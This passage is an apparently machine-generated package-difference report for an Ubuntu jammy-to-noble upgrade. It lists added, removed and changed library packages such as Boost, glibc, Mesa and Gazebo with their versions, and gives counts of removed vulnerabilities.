➖	libboost-random1.74-dev	1.74.0-14ubuntu3
➖	libboost-random1.74.0	1.74.0-14ubuntu3
➕	libboost-random1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-random1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-regex-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-regex1.74-dev	1.74.0-14ubuntu3
➖	libboost-regex1.74.0	1.74.0-14ubuntu3
➕	libboost-regex1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-regex1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-serialization-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-serialization1.74-dev	1.74.0-14ubuntu3
➖	libboost-serialization1.74.0	1.74.0-14ubuntu3
➕	libboost-serialization1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-serialization1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-stacktrace-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-stacktrace1.74-dev	1.74.0-14ubuntu3
➖	libboost-stacktrace1.74.0	1.74.0-14ubuntu3
➕	libboost-stacktrace1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-stacktrace1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-system-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-system1.74-dev	1.74.0-14ubuntu3
➖	libboost-system1.74.0	1.74.0-14ubuntu3
➕	libboost-system1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-system1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-test-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-test1.74-dev	1.74.0-14ubuntu3
➖	libboost-test1.74.0	1.74.0-14ubuntu3
➕	libboost-test1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-test1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-thread-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-thread1.74-dev	1.74.0-14ubuntu3
➖	libboost-thread1.74.0	1.74.0-14ubuntu3
➕	libboost-thread1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-thread1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-timer-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-timer1.74-dev	1.74.0-14ubuntu3
➖	libboost-timer1.74.0	1.74.0-14ubuntu3
➕	libboost-timer1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-timer1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-tools-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
♾️	libboost-type-erasure-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-type-erasure1.74-dev	1.74.0-14ubuntu3
➖	libboost-type-erasure1.74.0	1.74.0-14ubuntu3
➕	libboost-type-erasure1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-type-erasure1.83.0		1.83.0-2.1ubuntu3.2
➕	libboost-url-dev		1.83.0.1ubuntu2
➕	libboost-url1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-url1.83.0		1.83.0-2.1ubuntu3.2
♾️	libboost-wave-dev	1.74.0.3ubuntu7	1.83.0.1ubuntu2
➖	libboost-wave1.74-dev	1.74.0-14ubuntu3
➖	libboost-wave1.74.0	1.74.0-14ubuntu3
➕	libboost-wave1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost-wave1.83.0		1.83.0-2.1ubuntu3.2
➖	libboost1.74-dev	1.74.0-14ubuntu3
➖	libboost1.74-tools-dev	1.74.0-14ubuntu3
➕	libboost1.83-dev		1.83.0-2.1ubuntu3.2
➕	libboost1.83-tools-dev		1.83.0-2.1ubuntu3.2
♾️	libbrotli-dev	1.0.9-2build6	1.1.0-2build2
♾️	libbrotli1	1.0.9-2build6	1.1.0-2build2
♾️	libbs2b0	3.1.0+dfsg-2.2build1	3.1.0+dfsg-7build1
♾️	libbsd-dev	0.11.5-1	0.12.1-1build1.1
♾️	libbsd0	0.11.5-1	0.12.1-1build1.1
♾️	libbullet-dev	3.06+dfsg-4build2	3.24+dfsg-2.1build1
➖	libbullet3.06	3.06+dfsg-4build2
➕	libbullet3.24t64		3.24+dfsg-2.1build1
♾️	libbz2-1.0	1.0.8-5build1	1.0.8-5.1build0.1
➕	libbz2-dev		1.0.8-5.1build0.1
♾️	libc-bin	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc-dev-bin	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6-armhf-cross	2.35-0ubuntu1cross3	2.39-0ubuntu8cross1
♾️	libc6-dbg	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6-dev	2.35-0ubuntu3.11	2.39-0ubuntu8.7
♾️	libc6-dev-armhf-cross	2.35-0ubuntu1cross3	2.39-0ubuntu8cross1
➖	libcaca-dev	0.99.beta19-2.2ubuntu4
♾️	libcaca0	0.99.beta19-2.2ubuntu4	0.99.beta20-4ubuntu0.1
		Removed vulnerabilities (1):
♾️	libcairo-gobject2	1.16.0-5ubuntu2	1.18.0-3build1
➕	libcairo-script-interpreter2		1.18.0-3build1
♾️	libcairo2	1.16.0-5ubuntu2	1.18.0-3build1
➕	libcairo2-dev		1.18.0-3build1
♾️	libcap-dev	1:2.44-1ubuntu0.22.04.2	1:2.66-5ubuntu2.2
♾️	libcap-ng0	0.7.9-2.2build3	0.8.4-2build2
♾️	libcap2	1:2.44-1ubuntu0.22.04.2	1:2.66-5ubuntu2.2
♾️	libcap2-bin	1:2.44-1ubuntu0.22.04.2	1:2.66-5ubuntu2.2
➕	libcapture-tiny-perl		0.48-2
➕	libcbor0.10		0.10.2-1.2ubuntu2
➖	libcbor0.8	0.8.0-2ubuntu1
♾️	libcc1-0	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
➖	libcdio-cdda2	10.2+2.0.0-1build3
➕	libcdio-cdda2t64		10.2+2.0.1-1.1build2
➖	libcdio-paranoia2	10.2+2.0.0-1build3
➕	libcdio-paranoia2t64		10.2+2.0.1-1.1build2
➖	libcdio19	2.1.0-3ubuntu0.2
➕	libcdio19t64		2.1.0-4.1ubuntu1.2
♾️	libcdparanoia0	3.10.2+debian-14build2	3.10.2+debian-14build3
♾️	libcdt5	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	libcfitsio-dev	4.0.0-1	4.3.1-1.1build2
➕	libcfitsio10t64		4.3.1-1.1build2
➖	libcfitsio9	4.0.0-1
♾️	libcgraph6	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
➖	libcharls-dev	2.3.4-1
♾️	libcharls2	2.3.4-1	2.4.2-2build2
♾️	libchromaprint1	1.5.1-2	1.5.1-5
➕	libcjson1		1.7.17-1
➖	libclang1-14	1:14.0.0-1ubuntu1.1
➕	libclang1-15t64		1:15.0.7-14build3
➕	libclang1-18		1:18.1.3-1ubuntu1
➕	libclass-c3-perl		0.35-2
➕	libclass-data-inheritable-perl		0.08-3
➕	libclass-inspector-perl		1.36-3
➕	libclass-method-modifiers-perl		2.15-1
➕	libclass-singleton-perl		1.6-2
➖	libcodec2-1.0	1.0.1-3
➕	libcodec2-1.2		1.2.0-2build1
♾️	libcolord2	1.4.6-1	1.4.7-1build2
♾️	libcom-err2	1.46.5-2ubuntu1.2	1.47.0-2.4~exp1ubuntu4.1
♾️	libconsole-bridge-dev	1.0.1+dfsg2-3	1.0.1+dfsg2-3build1
♾️	libconsole-bridge1.0	1.0.1+dfsg2-3	1.0.1+dfsg2-3build1
♾️	libcrypt-dev	1:4.4.27-1	1:4.4.36-4build1
♾️	libcrypt1	1:4.4.27-1	1:4.4.36-4build1
♾️	libcryptsetup12	2:2.4.3-1ubuntu1.3	2:2.7.0-1ubuntu4.2
➖	libcsfml-audio2.5	2.5-1.1
➕	libcsfml-audio2.6		2.6.0-3build1
♾️	libcsfml-dev	2.5-1.1	2.6.0-3build1
➖	libcsfml-graphics2.5	2.5-1.1
➕	libcsfml-graphics2.6		2.6.0-3build1
➖	libcsfml-network2.5	2.5-1.1
➕	libcsfml-network2.6		2.6.0-3build1
➖	libcsfml-system2.5	2.5-1.1
➕	libcsfml-system2.6		2.6.0-3build1
➖	libcsfml-window2.5	2.5-1.1
➕	libcsfml-window2.6		2.6.0-3build1
♾️	libctf-nobfd0	2.38-4ubuntu2.12	2.42-4ubuntu2.8
♾️	libctf0	2.38-4ubuntu2.12	2.42-4ubuntu2.8
➖	libcups2	2.4.1op1-1ubuntu4.16
➕	libcups2t64		2.4.7-1.2ubuntu7.9
➖	libcurl3-gnutls	7.81.0-1ubuntu1.21
➕	libcurl3t64-gnutls		8.5.0-2ubuntu10.7
➖	libcurl4	7.81.0-1ubuntu1.21
♾️	libcurl4-openssl-dev	7.81.0-1ubuntu1.21	8.5.0-2ubuntu10.7
➕	libcurl4t64		8.5.0-2ubuntu10.7
♾️	libdart-core+collisions+odelcpsolver6.13	6.13.2+ds1-1~osrf2~jammy	6.13.2+ds1-1~osrf2~noble
➕	libdata-optlist-perl		0.114-1
➕	libdatetime-locale-perl		1:1.37-1
➕	libdatetime-perl		2:1.65-1build2
➕	libdatetime-timezone-perl		1:2.62-1+2024a
➕	libdatrie-dev		0.2.13-3build1
♾️	libdatrie1	0.2.13-2	0.2.13-3build1
♾️	libdav1d-dev	0.9.2-1	1.4.1-1build1
➖	libdav1d5	0.9.2-1
➕	libdav1d7		1.4.1-1build1
➖	libdb5.3	5.3.28+dfsg1-0.8ubuntu3
➕	libdb5.3t64		5.3.28+dfsg2-7
♾️	libdbus-1-3	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
♾️	libdbus-1-dev	1.12.20-2ubuntu4.1	1.14.10-4ubuntu4.1
♾️	libdc1394-25	2.2.6-4	2.2.6-4build1
♾️	libdc1394-dev	2.2.6-4	2.2.6-4build1
♾️	libdca0	0.0.7-2	0.0.7-2build1
♾️	libdconf1	0.40.0-3ubuntu0.1	0.40.0-4ubuntu0.1
♾️	libde265-0	1.0.8-1ubuntu0.3	1.0.15-1build3
♾️	libde265-dev	1.0.8-1ubuntu0.3	1.0.15-1build3
♾️	libdebconfclient0	0.261ubuntu1	0.271ubuntu3
♾️	libdecor-0-0	0.1.0-3build1	0.2.2-1build2
♾️	libdecor-0-dev	0.1.0-3build1	0.2.2-1build2
♾️	libdeflate-dev	1.10-2	1.19-1build1.1
♾️	libdeflate0	1.10-2	1.19-1build1.1
➕	libdevel-callchecker-perl		0.008-2build3
➕	libdevel-stacktrace-perl		2.0500-1
♾️	libdevmapper1.02.1	2:1.02.175-2.1ubuntu5	2:1.02.185-3ubuntu3.2
➕	libdirectfb-1.7-7t64		1.7.7-11.1ubuntu2
♾️	libdouble-conversion-dev	3.1.7-4	3.3.0-1build1
♾️	libdouble-conversion3	3.1.7-4	3.3.0-1build1
♾️	libdpkg-perl	1.21.1ubuntu2.6	1.22.6ubuntu6.5
➖	libdraco-dev	1.5.2+dfsg-2
➖	libdraco4	1.5.2+dfsg-2
➕	libdraco8		1.5.6+dfsg-3build1
♾️	libdrm-amdgpu1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-common	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-dev	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-etnaviv1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-freedreno1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-nouveau2	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-radeon1	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm-tegra0	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
♾️	libdrm2	2.4.113-2~ubuntu0.22.04.1	2.4.125-1ubuntu0.1~24.04.1
➕	libduktape207		2.7.0+tests-0ubuntu3
➖	libdv4	1.0.0-14build1
➕	libdv4t64		1.0.0-17.1build1
♾️	libdvdnav4	6.1.1-1	6.1.1-3build1
➖	libdvdread8	6.1.2-1
➕	libdvdread8t64		6.1.3-1.1build1
♾️	libdw-dev	0.186-1ubuntu0.1	0.190-1.1ubuntu0.1
➖	libdw1	0.186-1ubuntu0.1
➕	libdw1t64		0.190-1.1ubuntu0.1
➕	libdynaloader-functions-perl		0.003-3
♾️	libedit2	3.1-20210910-1build1	3.1-20230828-1build1
♾️	libegl-dev	1.4.0-1	1.7.0-1build1
♾️	libegl-mesa0	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libegl1	1.4.0-1	1.7.0-1build1
♾️	libegl1-mesa-dev	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libeigen3-dev	3.4.0-2ubuntu2	3.4.0-4build0.1
♾️	libelf-dev	0.186-1ubuntu0.1	0.190-1.1ubuntu0.1
➖	libelf1	0.186-1ubuntu0.1
➕	libelf1t64		0.190-1.1ubuntu0.1
➕	libepoxy-dev		1.5.10-1build1
♾️	libepoxy0	1.5.10-1	1.5.10-1build1
♾️	liberror-perl	0.17029-1	0.17029-2
♾️	libev-dev	1:4.33-1	1:4.33-2.1build1
➖	libev4	1:4.33-1
➕	libev4t64		1:4.33-2.1build1
➕	libeval-closure-perl		0.14-3
♾️	libevdev2	1.12.1+dfsg-1	1.13.1+dfsg-1build1
➖	libevent-2.1-7	2.1.12-stable-1build3
➕	libevent-2.1-7t64		2.1.12-stable-9ubuntu2
➖	libevent-core-2.1-7	2.1.12-stable-1build3
➕	libevent-core-2.1-7t64		2.1.12-stable-9ubuntu2
♾️	libevent-dev	2.1.12-stable-1build3	2.1.12-stable-9ubuntu2
➖	libevent-extra-2.1-7	2.1.12-stable-1build3
➕	libevent-extra-2.1-7t64		2.1.12-stable-9ubuntu2
➖	libevent-openssl-2.1-7	2.1.12-stable-1build3
➕	libevent-openssl-2.1-7t64		2.1.12-stable-9ubuntu2
➖	libevent-pthreads-2.1-7	2.1.12-stable-1build3
➕	libevent-pthreads-2.1-7t64		2.1.12-stable-9ubuntu2
➕	libexception-class-perl		1.45-1
♾️	libexif-dev	0.6.24-1build1	0.6.24-1build2
♾️	libexif12	0.6.24-1build1	0.6.24-1build2
♾️	libexpat1	2.4.7-1ubuntu0.6	2.6.1-2ubuntu0.4
		Removed vulnerabilities (2):
♾️	libexpat1-dev	2.4.7-1ubuntu0.6	2.6.1-2ubuntu0.4
➖	libext2fs2	1.46.5-2ubuntu1.2
➕	libext2fs2t64		1.47.0-2.4~exp1ubuntu4.1
♾️	libfaad2	2.10.0-2	2.11.1-1build1
♾️	libfabric1	1.11.0-3	1.17.0-3build2
♾️	libfcl0.7	0.7.0-3	0.7.0-3build2
➕	libfdisk1		2.39.3-9ubuntu6.4
♾️	libffi-dev	3.4.2-4	3.4.6-1build1
♾️	libffi8	3.4.2-4	3.4.6-1build1
➕	libfftw3-double3		3.3.10-1ubuntu3
♾️	libfido2-1	1.10.0-1	1.14.0-1build3
➕	libfile-sharedir-perl		1.118-3
♾️	libflac-dev	1.3.3-2ubuntu0.2	1.4.3+ds-2.1ubuntu2

[JLP04]

Packages and Vulnerabilities (2992 package changes and 236 vulnerability changes)

• ➕ 855 packages added
• ➖ 681 packages removed
• ♾️ 1456 packages changed
• 134 packages unchanged

• ❗ 10 vulnerabilities added
• ✔️ 226 vulnerabilities removed

Changes for packages of type deb (2647 changes)

➕	libflac12t64		1.4.3+ds-2.1ubuntu2
➖	libflac8	1.3.3-2ubuntu0.2
♾️	libflann-dev	1.9.1+dfsg-11	1.9.2+dfsg-2build1
♾️	libflann1.9	1.9.1+dfsg-11	1.9.2+dfsg-2build1
♾️	libflite1	2.2-3	2.2-6build3
♾️	libfluidsynth3	2.2.5-1	2.3.4-1build3
♾️	libfmt-dev	8.1.1+ds1-2	9.1.0+ds1-2
➖	libfmt8	8.1.1+ds1-2
➕	libfmt9		9.1.0+ds1-2
♾️	libfontconfig-dev	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	libfontconfig1	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	libfontconfig1-dev	2.13.1-4.2ubuntu5	2.15.0-1.1ubuntu2
♾️	libfontenc1	1:1.1.4-1build3	1:1.1.8-1build1
♾️	libfreeaptx0	0.1.1-1	0.1.1-2build1
♾️	libfreeimage-dev	3.18.0+ds2-6ubuntu5.1	3.18.0+ds2-10build4
♾️	libfreeimage3	3.18.0+ds2-6ubuntu5.1	3.18.0+ds2-10build4
♾️	libfreetype-dev	2.11.1+dfsg-1ubuntu0.3	2.13.2+dfsg-1build3
♾️	libfreetype6	2.11.1+dfsg-1ubuntu0.3	2.13.2+dfsg-1build3
➖	libfreetype6-dev	2.11.1+dfsg-1ubuntu0.3
♾️	libfreexl-dev	1.0.6-1	2.0.0-1build2
♾️	libfreexl1	1.0.6-1	2.0.0-1build2
➕	libfribidi-dev		1.0.13-3build1
♾️	libfribidi0	1.0.8-2ubuntu3.1	1.0.13-3build1
♾️	libfyba-dev	4.1.1-7	4.1.1-11build1
➖	libfyba0	4.1.1-7
➕	libfyba0t64		4.1.1-11build1
♾️	libgbm-dev	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libgbm1	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
➖	libgcc-11-dev	11.4.0-1ubuntu1~22.04.2
➖	libgcc-11-dev-armhf-cross	11.4.0-1ubuntu1~22.04cross1
➕	libgcc-13-dev		13.3.0-6ubuntu2~24.04.1
➕	libgcc-13-dev-armhf-cross		13.3.0-6ubuntu2~24.04cross1
♾️	libgcc-s1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libgcc-s1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libgcrypt20	1.9.4-3ubuntu3	1.10.3-2build1
♾️	libgd3	2.3.0-2ubuntu2.3	2.3.3-9ubuntu5
♾️	libgdal-dev	3.4.1+dfsg-1build4	3.8.4+dfsg-3ubuntu3
➖	libgdal30	3.4.1+dfsg-1build4
➕	libgdal34t64		3.8.4+dfsg-3ubuntu3
➖	libgdbm-compat4	1.23-1
➕	libgdbm-compat4t64		1.23-5.1build1
➖	libgdbm6	1.23-1
➕	libgdbm6t64		1.23-5.1build1
♾️	libgdcm-dev	3.0.10-1build2	3.0.22-2.1ubuntu1
➖	libgdcm3.0	3.0.10-1build2
➕	libgdcm3.0t64		3.0.22-2.1ubuntu1
♾️	libgdk-pixbuf-2.0-0	2.42.8+dfsg-1ubuntu0.4	2.42.10+dfsg-3ubuntu3.2
➕	libgdk-pixbuf-2.0-dev		2.42.10+dfsg-3ubuntu3.2
➕	libgdk-pixbuf2.0-bin		2.42.10+dfsg-3ubuntu3.2
♾️	libgdk-pixbuf2.0-common	2.42.8+dfsg-1ubuntu0.4	2.42.10+dfsg-3ubuntu3.2
➖	libgeographic-dev	1.52-1
➖	libgeographic19	1.52-1
➕	libgeographiclib-dev		2.3-1build1
➕	libgeographiclib26		2.3-1build1
➕	libgeos-c1t64		3.12.1-3build1
➖	libgeos-c1v5	3.10.2-1
♾️	libgeos-dev	3.10.2-1	3.12.1-3build1
➖	libgeos3.10.2	3.10.2-1
➕	libgeos3.12.1t64		3.12.1-3build1
♾️	libgeotiff-dev	1.7.0-2build1	1.7.1-5build1
♾️	libgeotiff5	1.7.0-2build1	1.7.1-5build1
➖	libgfortran-11-dev	11.4.0-1ubuntu1~22.04.2
➕	libgfortran-13-dev		13.3.0-6ubuntu2~24.04.1
♾️	libgfortran5	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libgif-dev	5.1.9-2ubuntu0.1	5.2.2-1ubuntu1
♾️	libgif7	5.1.9-2ubuntu0.1	5.2.2-1ubuntu1
♾️	libgirepository-1.0-1	1.72.0-1	1.80.1-1
➕	libgirepository-2.0-0		2.80.0-6ubuntu3.8
♾️	libgl-dev	1.4.0-1	1.7.0-1build1
♾️	libgl1	1.4.0-1	1.7.0-1build1
♾️	libgl1-mesa-dev	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libgl1-mesa-dri	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libgl2ps-dev	1.4.2+dfsg1-2	1.4.2+dfsg1-2build1
♾️	libgl2ps1.4	1.4.2+dfsg1-2	1.4.2+dfsg1-2build1
➖	libglapi-mesa	23.2.1-1ubuntu3.1~22.04.3
♾️	libgles-dev	1.4.0-1	1.7.0-1build1
♾️	libgles1	1.4.0-1	1.7.0-1build1
♾️	libgles2	1.4.0-1	1.7.0-1build1
♾️	libglew-dev	2.2.0-4	2.2.0-4build1
♾️	libglew2.2	2.2.0-4	2.2.0-4build1
➖	libglib2.0-0	2.72.4-0ubuntu2.6
➕	libglib2.0-0t64		2.80.0-6ubuntu3.8
♾️	libglib2.0-bin	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
♾️	libglib2.0-data	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
♾️	libglib2.0-dev	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
		Removed vulnerabilities (9):
♾️	libglib2.0-dev-bin	2.72.4-0ubuntu2.6	2.80.0-6ubuntu3.8
♾️	libglu1-mesa	9.0.2-1	9.0.2-1.1build1
♾️	libglu1-mesa-dev	9.0.2-1	9.0.2-1.1build1
♾️	libglvnd-core-dev	1.4.0-1	1.7.0-1build1
♾️	libglvnd-dev	1.4.0-1	1.7.0-1build1
♾️	libglvnd0	1.4.0-1	1.7.0-1build1
♾️	libglx-dev	1.4.0-1	1.7.0-1build1
♾️	libglx-mesa0	23.2.1-1ubuntu3.1~22.04.3	25.2.8-0ubuntu0.24.04.1
♾️	libglx0	1.4.0-1	1.7.0-1build1
♾️	libgme0	0.6.3-2	0.6.3-7build1
♾️	libgmp10	2:6.2.1+dfsg-3ubuntu1	2:6.3.0+dfsg-2ubuntu6.1
➖	libgnutls30	3.7.3-4ubuntu1.7
		Removed vulnerabilities (2):
➕	libgnutls30t64		3.8.3-1.1ubuntu3.5
♾️	libgomp1	12.3.0-1ubuntu1~22.04.2	14.2.0-4ubuntu2~24.04.1
♾️	libgomp1-armhf-cross	12.3.0-1ubuntu1~22.04cross1	14.2.0-4ubuntu2~24.04cross1
♾️	libgpg-error0	1.43-3	1.47-3build2.1
➖	libgphoto2-6	2.5.27-1build2
➕	libgphoto2-6t64		2.5.31-2.1ubuntu1
♾️	libgphoto2-dev	2.5.27-1build2	2.5.31-2.1ubuntu1
➖	libgphoto2-port12	2.5.27-1build2
➕	libgphoto2-port12t64		2.5.31-2.1ubuntu1
♾️	libgpm2	1.20.7-10build1	1.20.7-11
➕	libgprofng0		2.42-4ubuntu2.8
♾️	libgraphene-1.0-0	1.10.8-1	1.10.8-3build2
♾️	libgraphite2-3	1.3.14-1build2	1.3.14-2build1
➕	libgraphite2-dev		1.3.14-2build1
♾️	libgsm1	1.0.19-1	1.0.22-1build1
♾️	libgssapi-krb5-2	1.19.2-2ubuntu0.7	1.20.1-6ubuntu2.6
➖	libgssdp-1.2-0	1.4.0.1-2build1
➕	libgssdp-1.6-0		1.6.3-1build3
➖	libgssrpc4	1.19.2-2ubuntu0.7
➕	libgssrpc4t64		1.20.1-6ubuntu2.6
♾️	libgstreamer-gl1.0-0	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	libgstreamer-plugins-bad1.0-0	1.20.3-0ubuntu1.1	1.24.2-1ubuntu4
♾️	libgstreamer-plugins-base1.0-0	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	libgstreamer-plugins-base1.0-dev	1.20.1-1ubuntu0.5	1.24.2-1ubuntu0.3
♾️	libgstreamer-plugins-good1.0-0	1.20.3-0ubuntu1.4	1.24.2-1ubuntu1.2
♾️	libgstreamer1.0-0	1.20.3-0ubuntu1.1	1.24.2-1ubuntu0.1
♾️	libgstreamer1.0-dev	1.20.3-0ubuntu1.1	1.24.2-1ubuntu0.1
♾️	libgtest-dev	1.11.0-3	1.14.0-1
➖	libgtk-3-0	3.24.33-1ubuntu2.2
➕	libgtk-3-0t64		3.24.41-4ubuntu1.3
♾️	libgtk-3-common	3.24.33-1ubuntu2.2	3.24.41-4ubuntu1.3
➕	libgtk-3-dev		3.24.41-4ubuntu1.3
➖	libgts-0.7-5	0.7.6+darcs121130-5
➕	libgts-0.7-5t64		0.7.6+darcs121130-5.2build1
♾️	libgts-dev	0.7.6+darcs121130-5	0.7.6+darcs121130-5.2build1
♾️	libgudev-1.0-0	1:237-2build1	1:238-5ubuntu1
♾️	libgudev-1.0-dev	1:237-2build1	1:238-5ubuntu1
➖	libgupnp-1.2-1	1.4.3-1
➕	libgupnp-1.6-0		1.6.6-1build3
➖	libgupnp-igd-1.0-4	1.2.0-1build1
➕	libgupnp-igd-1.6-0		1.6.0-3build3
♾️	libgvc6	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	libgvpr2	2.42.2-6ubuntu0.1	2.42.2-9ubuntu0.1
♾️	libgz-cmake3-dev	3.5.5-1~jammy	3.5.6-1~noble
♾️	libgz-common5	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-av	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-av-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-core-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-events	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-events-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-geospatial	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-geospatial-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-graphics	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-graphics-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-io	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-io-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-profiler	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-profiler-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-testing	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-common5-testing-dev	5.7.1-1~jammy	5.8.0-1~noble
♾️	libgz-fuel-tools9	9.1.1-1~jammy	9.1.1-1~noble
♾️	libgz-fuel-tools9-dev	9.1.1-1~jammy	9.1.1-1~noble
♾️	libgz-gui8	8.4.0-1~jammy	8.4.0-1~noble
♾️	libgz-gui8-dev	8.4.0-1~jammy	8.4.0-1~noble
♾️	libgz-launch7	7.0.0-1~jammy	7.1.1-1~noble
♾️	libgz-launch7-dev	7.0.0-1~jammy	7.1.1-1~noble
♾️	libgz-math7	7.5.1-1~jammy	7.5.1-1~noble
♾️	libgz-math7-dev	7.5.1-1~jammy	7.5.1-1~noble
♾️	libgz-math7-eigen3-dev	7.5.1-1~jammy	7.5.1-1~noble
♾️	libgz-msgs10	10.3.2-1~jammy	10.3.2-1~noble
♾️	libgz-msgs10-dev	10.3.2-1~jammy	10.3.2-1~noble
♾️	libgz-physics7	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-bullet	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-bullet-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-core-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-dartsim	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-dartsim-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-heightmap-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-mesh-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-sdf-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpe	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpe-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpelib	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-physics7-tpelib-dev	7.6.0-1~jammy	7.6.0-1~noble
♾️	libgz-plugin2	2.0.4-1~jammy	2.0.4-1~noble
♾️	libgz-plugin2-dev	2.0.4-1~jammy	2.0.4-1~noble
♾️	libgz-rendering8	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-core-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre1	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre1-dev	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre2	8.2.3-1~jammy	8.2.3-1~noble
♾️	libgz-rendering8-ogre2-dev	8.2.3-1~jammy	8.2.3-1~noble
